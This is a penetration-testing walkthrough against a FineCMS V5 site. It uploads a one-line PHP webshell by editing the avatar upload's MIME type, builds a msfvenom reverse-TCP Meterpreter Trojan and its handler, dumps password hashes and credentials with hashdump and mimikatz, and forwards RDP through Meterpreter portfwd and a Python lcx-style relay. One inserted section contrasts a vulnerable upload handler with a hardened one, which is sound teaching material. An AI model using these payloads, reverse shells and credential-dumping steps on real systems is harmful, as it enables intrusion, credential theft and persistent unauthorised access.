Different operating systems may carry version vulnerabilities, middleware vulnerabilities, component vulnerabilities, open-port service vulnerabilities, and so on. During a penetration test, the attack approach is worked out from the information gathered in the reconnaissance phase.
Intranet penetration approach
The intranet penetration approach is as follows: gather information on the target website, attack the web server to obtain a foothold and server privileges, then use the compromised server as a springboard (pivot) to attack other hosts on the internal network, and finally obtain sensitive data (system passwords, etc.). Backdoor Trojans or other backdoors are then installed to keep long-term control and access to that data. A second approach is to attack the workstations and wireless networks of the enterprise office network through social engineering and similar methods, take control of office computers, and then make use of the data found on the office network.
Detailed explanation of the penetration process
The penetration process is divided into three stages: Webshell -> GetShell -> privilege escalation.
Webshell stage: visit the target website, which is built on FineCMS V5, and create a new user for testing.
A first look at the page template identifies the site-building system as FineCMS V5. We then register a new user, which is what lets us exploit the FineCMS V5 file upload vulnerability.
Reference link: Blog.csdn.net/dfdhxb99539…
The file upload vulnerability is in the member profile picture (avatar) upload, so first register an account, log in, and upload our one-line PHP Trojan.
The file is initially submitted as 0x0.png.
Intercept the request with the Burp proxy and, inside the tx parameter that carries the image as a data URI, replace image/png with image/php. The server derives the stored file's extension from that MIME type, so the avatar is written to disk as a .php file.
Requesting the uploaded file with the parameter v=phpinfo(); returns the phpinfo page, which verifies that the webshell is working.
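The upload bypass in the steps above, as an added example that is not part of the original post and not FineCMS's own code: a Python reconstruction of the weak pattern the bypass relies on (the stored extension is taken from the MIME type declared inside the tx data URI) beside a hardened handler that allowlists types, checks the content's magic bytes against the declared type and picks the file name itself. The function names, the tiny PNG stand-in and the sample one-line Trojan are constructed for the example.

```python
import base64
import os
import re
import secrets
import tempfile

# Magic bytes for the only image types the hardened handler accepts.
MAGIC = {
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
# The server, not the client, decides the extension.
EXTENSION = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}

DATA_URI = re.compile(r"data:([\w.+-]+/[\w.+-]+);base64,(.+)", re.S)


def parse_data_uri(tx):
    """Split a 'data:<mime>;base64,<payload>' string into (mime, raw bytes)."""
    m = DATA_URI.fullmatch(tx)
    if not m:
        raise ValueError("tx is not a base64 data URI")
    return m.group(1), base64.b64decode(m.group(2), validate=True)


def save_avatar_vulnerable(tx, upload_dir, user_id):
    """Weak pattern (reconstructed for illustration, not FineCMS's code): the
    extension is copied from the MIME subtype the client declared, so a
    declared image/php becomes <user_id>.php inside the web root."""
    mime, data = parse_data_uri(tx)
    ext = mime.split("/", 1)[1]
    path = os.path.join(upload_dir, f"{user_id}.{ext}")
    with open(path, "wb") as f:
        f.write(data)
    return path


def save_avatar_hardened(tx, upload_dir, user_id):
    """Hardened handler: allowlisted MIME types only, extension chosen by the
    server, content must match the declared type, random unpredictable name."""
    mime, data = parse_data_uri(tx)
    if mime not in EXTENSION:
        raise ValueError(f"rejected MIME type {mime!r}")
    if not data.startswith(MAGIC[mime]):
        raise ValueError("file content does not match the declared image type")
    # user_id belongs in a server-side mapping, never in the file name.
    name = secrets.token_hex(16) + EXTENSION[mime]
    path = os.path.join(upload_dir, name)
    with open(path, "wb") as f:
        f.write(data)
    return path


def demo():
    """Replay the walkthrough's bypass against both handlers (constructed input)."""
    webshell = b"<?php @eval($_POST['v']); ?>"        # the one-line Trojan
    legit_png = MAGIC["image/png"][0] + b"\x00" * 16  # stand-in for a real PNG
    b64 = lambda raw: base64.b64encode(raw).decode()
    attack_tx = "data:image/php;base64," + b64(webshell)   # the Burp edit
    smuggled_tx = "data:image/png;base64," + b64(webshell)  # PHP under a real type
    legit_tx = "data:image/png;base64," + b64(legit_png)
    results = {}
    with tempfile.TemporaryDirectory() as d:
        results["vulnerable_ext"] = os.path.splitext(
            save_avatar_vulnerable(attack_tx, d, 42))[1]
        for key, tx in (("hardened_rejects", attack_tx),
                        ("mismatch_rejects", smuggled_tx)):
            try:
                save_avatar_hardened(tx, d, 42)
                results[key] = False
            except ValueError:
                results[key] = True
        results["legit_ext"] = os.path.splitext(
            save_avatar_hardened(legit_tx, d, 42))[1]
    return results


if __name__ == "__main__":
    print(demo())
```

The vulnerable handler happily writes 42.php; the hardened one rejects the image/php type outright and also rejects PHP source smuggled under a genuine image type, because the bytes do not start with the PNG signature. Storing uploads outside the web root, or serving them with a handler that never executes them, is the other half of the fix.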
Once the upload is verified, open China Chopper (菜刀, the "kitchen knife" webshell client), enter the path of the uploaded file and the parameter name (the one-line Trojan's password, v here), and it connects to the server.
From China Chopper you can also attempt database privilege escalation, for example MOF privilege escalation, UDF privilege escalation, and so on.
Writing an AV-evading Trojan
Connecting to the target server through the webshell gives only limited access: we run as the account the web site runs under, and only part of the file system is reachable. So we build a reverse-shell Trojan, su.exe, that connects back to our machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.130 LPORT=4444 -f exe > /root/Desktop/su.exe

Caveat: a plain msfvenom executable like this is signatured by most antivirus products; the "AV-evading" (免杀) part needs an encoder, packer or custom loader that the walkthrough does not show.
Upload the tools we need through the file management feature of the China Chopper connection we just established.
Start the Meterpreter handler in msfconsole and set its parameters to match the payload:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.10.130
set lport 4444
run
In China Chopper's virtual terminal, which gives a command prompt on the Win2008 server, execute the uploaded Trojan so that it runs.
The handler then receives the Meterpreter session.
Obtaining passwords
In the Meterpreter session, dump the local password hashes and load mimikatz to extract credentials:

hashdump
load mimikatz
kerberos

Note: in current Metasploit the mimikatz extension has been replaced by kiwi (load kiwi, then creds_all); the commands above are those of the older extension.
Note: if the Win2008 host is configured not to allow Remote Desktop connections to this computer, port forwarding alone achieves nothing; Remote Desktop has to be enabled first.
Enabling the Remote Desktop
Approach 1: enable and reach Remote Desktop through Meterpreter (for example with the post/windows/manage/enable_rdp module).
Then set up port forwarding with portfwd, where -l is the local port, -p the remote port and -r the target host:

portfwd add -l 5555 -p 3389 -r <target IP>

This forwards port 3389 on the target to local port 5555. Connect to the local port to reach the remote desktop:

rdesktop -u <username> -p <password> 127.0.0.1:5555
Approach 2: use lcx for the remote connection. This is the route when the attack machine runs Windows and you want to connect with mstsc. Start the listening end on the attack machine first (it must be up before the target dials in):

lcx.exe -listen 5555 33891

Then drop into a command shell on the target (shell in Meterpreter) and run the slave end, which connects out from the target to the attack machine's port 5555 and splices that connection to the target's port 3389:

lcx.exe -slave 192.168.10.20 5555 192.168.10.10 3389

Finally open mstsc on the attack machine and connect to 127.0.0.1:33891.
Below, the connection succeeds and the listener relays the data.
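The two lcx modes used above, as an added example that is not part of the original post and not the lcx tool's own source: a minimal Python relay implementing -listen (attacker side) and -slave (target side), plus a loopback demo in which an echo server stands in for the RDP service on 3389. All function names here are the example's own; the demo binds ephemeral loopback ports only.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then close dst's write
    side so the peer on that leg sees EOF as well."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def bridge(a, b):
    """Relay in both directions between sockets a and b until both sides close."""
    t = threading.Thread(target=_pump, args=(a, b), daemon=True)
    t.start()
    _pump(b, a)
    t.join()
    a.close()
    b.close()


def lcx_listen(port1, port2, host="127.0.0.1"):
    """Attacker side, 'lcx -listen port1 port2': wait for the target's
    connect-back on port1 and for the operator's client (mstsc) on port2,
    then bridge them. Returns the two bound ports (handy when 0 was passed)."""
    socks = []
    for port in (port1, port2):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((host, port))
        s.listen(1)
        socks.append(s)
    s1, s2 = socks

    def serve():
        victim, _ = s1.accept()   # the host behind the firewall dials out to us
        client, _ = s2.accept()   # our RDP client connects locally
        s1.close()
        s2.close()
        bridge(victim, client)

    threading.Thread(target=serve, daemon=True).start()
    return s1.getsockname()[1], s2.getsockname()[1]


def lcx_slave(attacker_host, attacker_port, target_host, target_port):
    """Target side, 'lcx -slave attacker_ip attacker_port target_ip target_port':
    dial out to the attacker (outbound connections usually pass the firewall),
    open the local service (3389 in the walkthrough) and splice the two."""
    outbound = socket.create_connection((attacker_host, attacker_port))
    service = socket.create_connection((target_host, target_port))
    bridge(outbound, service)


def run_demo(message=b"RDP-hello"):
    """Wire everything up on loopback with an echo server as a constructed
    stand-in for RDP; return what the operator's client gets back."""
    echo = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    echo.bind(("127.0.0.1", 0))
    echo.listen(1)
    echo_port = echo.getsockname()[1]

    def echo_serve():
        conn, _ = echo.accept()
        echo.close()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    threading.Thread(target=echo_serve, daemon=True).start()

    p1, p2 = lcx_listen(0, 0)                       # "lcx -listen 5555 33891"
    threading.Thread(target=lcx_slave,              # "lcx -slave ... 3389"
                     args=("127.0.0.1", p1, "127.0.0.1", echo_port),
                     daemon=True).start()

    client = socket.create_connection(("127.0.0.1", p2))  # "mstsc 127.0.0.1:33891"
    client.settimeout(5)
    client.sendall(message)
    reply = b""
    while len(reply) < len(message):
        chunk = client.recv(4096)
        if not chunk:
            break
        reply += chunk
    client.close()
    return reply


if __name__ == "__main__":
    print(run_demo())
```

The point of the slave mode is direction: the target initiates the TCP connection to the attack machine, so an inbound filter on 3389 does not matter, and everything the operator's client sends to the second listening port travels back down that outbound connection to the target's own RDP service.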
Conclusion
Different operating systems may carry version, middleware, component and port-service vulnerabilities, and in a penetration test the attack path comes from the information gathered. Here, identifying the CMS as FineCMS V5 led to the avatar upload vulnerability and a webshell; the webshell gave only the web account's access, which a reverse Meterpreter shell and password dumping extended; and port forwarding, through Meterpreter or lcx, turned that foothold into a Remote Desktop session on the server.